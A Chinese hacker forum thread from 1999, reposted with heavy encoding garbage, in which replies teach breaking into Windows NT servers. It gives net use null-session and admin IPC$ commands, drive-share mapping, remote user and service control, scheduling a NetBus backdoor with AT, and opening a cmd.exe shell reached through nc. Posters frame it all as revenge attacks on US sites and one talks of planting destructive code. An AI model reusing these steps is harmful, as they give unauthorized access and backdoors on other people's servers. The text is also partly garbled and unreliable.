《版主頁黑客工具和文章的幾個問題》中提到:5 a8 l" F1 t! P7 p- E& U/ [3 Q& n
請教����,從版主頁上載得PINGER,GRINDER�����,LETMEIN等�,卻不能用,PINGER安裝后��,明明安裝前文件有1M多����,但安裝完后生成的文件夾中只有PINGER��。EXE��,40多K��,運(yùn)行PINGER����,設(shè)置好IP��,點(diǎn)PING�,彈出一個窗口(C++。��。��。)����,說出錯,然后關(guān)閉了��,何故����,是不是安裝有誤�����? 2���。運(yùn)行LETMEIN,彈出以下錯誤:連接文件LETMEIN��。EXE到不存在的NETAPI32���。DLL;NETGROUPGETUSERS����。 是否說明需要NETAPI32。DLL文件�����,哪里有該DLL���。 3�。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運(yùn)行以下步驟等�,是否要求我的操作系統(tǒng)也是WINNT4。0 ��,應(yīng)該不是吧�? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT�����,還是服務(wù)器的操作系統(tǒng)為NT��? 太多的問題需高手回答�����,我花那么多的時間和金錢下載這幾M文件卻不能用����,實(shí)在窩囊哦, 強(qiáng)烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章��,以提高我國黑客水平����。- w7 M, U2 c% q3 F2 O! z( ^
> 我的機(jī)子MMX166�,WIN98�����,2�����。5G���,32M內(nèi)存�。 `% C, r. E7 J) [
: o _& z$ a% H. w/ w黑客并不神秘����,你只要了解操作系統(tǒng)�,學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn),輔助相關(guān)的工具���,就可以成功���。
: i& b: Q: n/ p* l: q6 d3 B你的問題是,pinger, grinder, letmein等工具必須要在NT上運(yùn)行�����,我們強(qiáng)烈建議,你一定要安裝NT�����,對于你的機(jī)器配制�,和我們現(xiàn)在差不多,只是比你多了32M內(nèi)存����,2G硬盤。
2 I0 k; V) S# U4 W6 k+ ?! M9 e其實(shí)��,攻擊敵站����,利用其操作系統(tǒng)本身的工具就可以了,比如�,我們在NT上攻擊某服務(wù)器,該服務(wù)器為NT4.0�,我們將做如下簡單事情就有可能成功,假設(shè)目標(biāo)NT的IP地址為111.111.111.111���,做法如下:
% B! \- z8 m. n$ T( i! p( l5 i* \/ onet use \\111.111.111.111\ipc$ "" /user:""6 z' a" w8 N1 L6 {. \/ ]
net.exe是NT的工具文件�����,該命令將和目標(biāo)服務(wù)器建立Null Session����,如果成功,你可以查看該服務(wù)器上的共享目錄:
; u8 r& }; h9 k" \% Qnet view \\111.111.111.111
2 q4 x* y& Q: y. _4 Q當(dāng)然�����,如果你有該NT管理員密碼�,就更好辦了,假設(shè)其管理員Admin密碼為fuck:
" F# m w- V& G% h2 Anet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"4 `! U" M* K) H$ R/ A- ^3 |
命令成功后�����,幾乎所有目標(biāo)NT上的配制���,資源����,你都可以在你本地NT上連接遠(yuǎn)程計算機(jī)來查看或修改:7 `7 I9 b3 G6 `6 W) {. ?
1�、查看或修改遠(yuǎn)程機(jī)器上的硬盤���,假如目標(biāo)NT上有C�、D兩個硬盤:; u6 _/ `/ `+ h) p% v
net use x: \\111.111.111.111\c$
6 s) @6 o: P5 e: e% _- d% A) @6 h/ pnet use y: \\111.111.111.111\d$$ J' X5 i5 H5 F& j/ ?9 \& U
這樣,目標(biāo)NT上的C���、D盤分別被影射為你本地的X�����、Y盤���,你想怎么做都可以...
4 F) y7 [2 t7 ^2、管理目標(biāo)NT的用戶:
; k4 E6 u) T: w5 ^; q9 ^從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
* E, p5 g+ j2 b& @% X鍵入\\111.111.111.111后�,目標(biāo)NT上的所有用戶你想怎么做都可以,和管理你本地的一樣, U# s9 s: G% Q; s7 M7 m
3��、管理目標(biāo)NT的服務(wù)
4 C9 d$ q' `2 i* Z/ ~選擇“管理工具(公用)”->“服務(wù)器管理”->“計算機(jī)”->“選擇域”$ G4 h. Z+ ?- c# I4 R
這樣你可以管理目標(biāo)NT上的服務(wù)�,共享目錄
9 C6 _& \6 G/ g r) ?7 h" W4、IIS管理
- p9 X2 p, E& V, q選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
* ?; A5 @# Y" a. P目標(biāo)NT的FTP�、WWW服務(wù)你就可以重新配置
" l4 Y M9 h5 d6 q$ X# k( c; U5、事件管理3 O6 s4 `6 \+ N5 Z+ e
“事件查看器”->連接到服務(wù)器->111.111.111.111
5 J5 z5 l3 L1 K, v. n8 S0 H
5 E N$ x4 L/ @+ D% z5 W還有更多的東西����,都可以用NT本身的功能來完成,這些都是95, 98所不能實(shí)現(xiàn)的。8 C% j' z, `7 b8 W& Q
& M- D' ~: _. Q1 \
當(dāng)然����,98,95也能做一些事情,但很麻煩����,比如:
7 |! l5 ~* ~0 H' ynet use \\111.111.111.111\ipc$4 P7 L* W, I0 [' \# R
net use z: \\111.111.111.111\d$; \# n$ E! b/ X5 p! ^
但其后不能帶參數(shù),即改用其他用戶或密碼���,系統(tǒng)將用當(dāng)前用戶和密碼去登錄�,如果你知道目標(biāo)NT的用戶或密碼��,重新啟動95, 98���,改用該用戶和密碼登錄����,方可實(shí)現(xiàn)�,你可以連接目標(biāo)NT上的共享資源,但不能進(jìn)行管理����,如用戶��、事件等3 @% r5 e; ?4 Z/ S
- y1 {$ o( h w, i我們強(qiáng)烈建議各位有心要為死難者報仇,真正的想黑霉國的站點(diǎn)�����,花點(diǎn)時間��,裝個NT吧���,NT Workstation也可以�! ?% J) n7 l6 S( f3 j' r
這樣����,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用!/ Z, p7 r. b; f8 V* p+ R0 i
( {0 f$ D+ @& R+ m" a
9 _8 ~' x; H& i7 `( V- _
--------------------------------------------------------------------------------8 C4 w+ E, Z! [4 i: d
2 x' F; j3 u: l3 w; {. F
>quack于1999-06-12��,23:37:44* s6 L9 W6 e4 ]$ r* t& J( m8 D) |
在大作《幾個有關(guān)黑的問題》中提到:
- O: E& X- P* ?( N6 W1 U" V) q- z首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機(jī)子,但運(yùn)行程序時卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!���。/ Y1 V$ p9 p' y) m
7 \ t% U( t! C
killusa于1999-06-13�,03:25:153 R" v8 T/ Q& V2 w
在大作《Re: 幾個有關(guān)黑的問題》中提到:6 z$ t0 G6 a! M) l( Q" y
+ M3 ~9 W& {5 m! W( }( tletmein.exe 暫時沒有mypwd參數(shù)���,十分抱歉. w; T" P0 M, i+ P/ V5 c z% C6 G
pinger程序�����,只是利用ping來尋找主機(jī)��,每臺NT服務(wù)器有一個主IP地址���,但也可以設(shè)置多個輔助IP地址�����,比如有些服務(wù)器供應(yīng)商�,一臺NT服務(wù)器上可以設(shè)置一千多個IP�����,每個IP對應(yīng)一個Hostname,而真正能找到主機(jī)名的只有一個IP地址����,就是該主機(jī)的主IP地址,所以有時顯示只有IP��,而無主機(jī)名�����。另外,有些服務(wù)器是非NT的操作系統(tǒng)�,有時將不會顯示主機(jī)名。當(dāng)然����,有時在服務(wù)器上進(jìn)行一些設(shè)置�����,也會出現(xiàn)上面的情況����。 }/ t* R v8 j" ~' V4 h+ @! }
3 m5 h* r6 F8 ~4 a% VNetbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個程序,所以���,netbus.exe是不用上傳的���,只需在目的
1 u7 P( [5 M" z1 }% y- q# x% ?, a服務(wù)器上運(yùn)行ntsrv.exe,而在目的服務(wù)器運(yùn)行該程序有很多種方法:; \" ~% }( n9 T- F5 t; v/ H
$ R3 y9 j6 N; B! A$ ?8 Q/ O `
1�����、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時運(yùn)行某程序����,具體使用方法��,可在自己的NT Dos窗口下鍵入以下:
# ^" b' {0 L6 h
2 ?; W7 p# O, j) D: \7 L K+ hC:\>net start schedule% k1 R& C6 ?& o, A; E& z( A
Schedule 正在啟動服務(wù)...... B% U) ?0 T1 R( o
Schedulw 服務(wù)啟動成功���。3 ~5 ?( z/ a' [% Y) H0 d
C:\>at /?& M; |9 Z% r. k3 ]$ a
AT 命令排定在特定的日期和時間運(yùn)行某些命令和程序。
6 d2 c- q& W8 W; i8 M運(yùn)行 AT 命令之前必須先啟動 Schedule 服務(wù)��。9 S" m# W/ g( t$ I u. j
% l7 s0 T3 S% u
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]" C1 N* q6 J6 ?
AT [\\computername] time [/INTERACTIVE]
1 r! B6 C; b# e `) E9 J; I[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
3 o2 |/ q9 G: ~$ j) P
0 M+ @9 b, z; }3 O5 O; R% W\\computername 指定遠(yuǎn)程計算機(jī)�。 如果省略這個參數(shù)
6 U* t* @' r" U+ Q, u& f+ q# M0 d6 |命令會被排定在本機(jī)上運(yùn)行。7 F" i2 e& U: c% y
id 指定給排定進(jìn)度命令的識別號�。, Y0 ?) X, j- i$ t
- ]" O4 g: J* p% Q2 u' V/delete 刪除某個已排定進(jìn)度的命令。如果省略標(biāo)識����,計算機(jī)上所有已排定進(jìn)度的命令都會被刪除。3 _1 Q; Q5 |6 d% a
/yes 用于刪除所有作業(yè)�,且不想在運(yùn)行刪除時顯示確認(rèn)信息 。
, _, e/ C7 Q9 rtime 指定命令運(yùn)行的時間�。5 n1 Y: C5 ^, h6 G
/interactive 允許作業(yè)在運(yùn)行時,與用戶通過桌面交互�����。7 V" E" q# q% G
% i' d7 k7 L3 ~, r) L, ^* Y# E/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令���。5 o S- W0 E. D$ Q
如果省略日期��,則默認(rèn)為在每月的本日運(yùn)行�����。
: R4 ?, u* y" g+ }& I: a1 i7 c6 E/ Q$ ]/ x
/next:date[,...] 指定在下一個指定日期 (如�,下周三),運(yùn)行命令�����。如果省略日期���,則默認(rèn)為在每月的本日運(yùn)行。% f! G+ { I6 i
4 v% Y$ s) U+ n8 ^& c
"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件�。
. D# Z9 S h9 q6 W9 k$ u1 Y# Z' b/ ?9 r$ y+ o6 v: e% O; D: s
C:\>6 n$ G1 z0 _3 x; \: D4 r. o
' x$ K" F2 f4 Y8 G4 V: }知道了如何使用AT,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:
: R+ ]- a* R& T& Z1 利用管理員登陸到目的服務(wù)器�����,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
: ]+ m5 j) M z) x6 `2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
+ q+ ]* j3 Z% K; ?3 E* z, g' L- ]- X3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時運(yùn)行�����,當(dāng)然最快運(yùn)行最理想,所以�,你可以用letmein.exe得到服務(wù)器的時間,然后:( ^7 Z6 f9 U8 }* t% N9 d2 ^
at \\x.x.x.x 00:00 ntsrv.exe /port:64321% P+ h( \" a* U* U" ?
其中00:00要改為用letmein.exe得回來的具體時間+一點(diǎn)容量����,等一會后,再在本地啟動netbus.exe�����,鍵入目的服務(wù)器得ip地址或hostname���,連接��!具體使用可參照 "How to get in nt"����,比如第一種方法���,你想要在目的服務(wù)器運(yùn)行 LEGION�����,可以利用netbus得上傳功能��,將LEGION上傳至目的服務(wù)器�,再用netbus的"Start program",鍵入完整路徑的LEGION運(yùn)行程序�����,就ok了�!第二種方法是利用netbus的“App redirect”功能,啟動遠(yuǎn)程telnet服務(wù)��,如下:在netbus中擊“App redirect”�����,鍵入"C:\>winnt\system32\cmd.exe"�����,Port為:4321����,服務(wù)就啟動了����,然后在本地運(yùn)行:nc x.x.x.x 4321�����,出現(xiàn)dos啟動的畫面就表示連接成功:
. B3 f4 Z6 A: ~, SMicrosoft(R) Windows NT(TM)
& W3 x$ X* A( S) L4 Y# ~$ t$ G7 C(C) Copyright 1985-1996 Microsoft Corp.
( \; ^8 n0 @! {) }4 H8 B& n5 ]C:\>
; m6 H" |! A0 r
7 z2 O' \ u, H5 i; R$ b2�、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器
* Y2 \ }2 O0 f+ G, t5 ^
5 G6 c) C* l) |7 K/ G y將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄��,如cgi-bin或scripts���,然后在瀏覽器鍵入url如:! b" I O2 d0 z6 F9 r3 S, [- N
http://x.x.x.x/scripts/ntsrv.exe /port:64321' d- }" n+ J; ]0 {* A
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
, g2 |7 H* J0 [ O4 z( d7 Q2 q9 d該程序就啟動了
& G3 v6 _: Z$ P, E" x# _
' }0 L7 e- \( g0 Q; f1 x我只提這幾中方法�!& e) A/ ?5 M$ S8 S4 f7 e8 q
要成功���,必須打好基礎(chǔ)工���,對操作系統(tǒng)充分了解!
! q9 ^$ l; ~; F4 M4 z$ Z; \) C2 M
. K5 b6 _5 t. g |
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡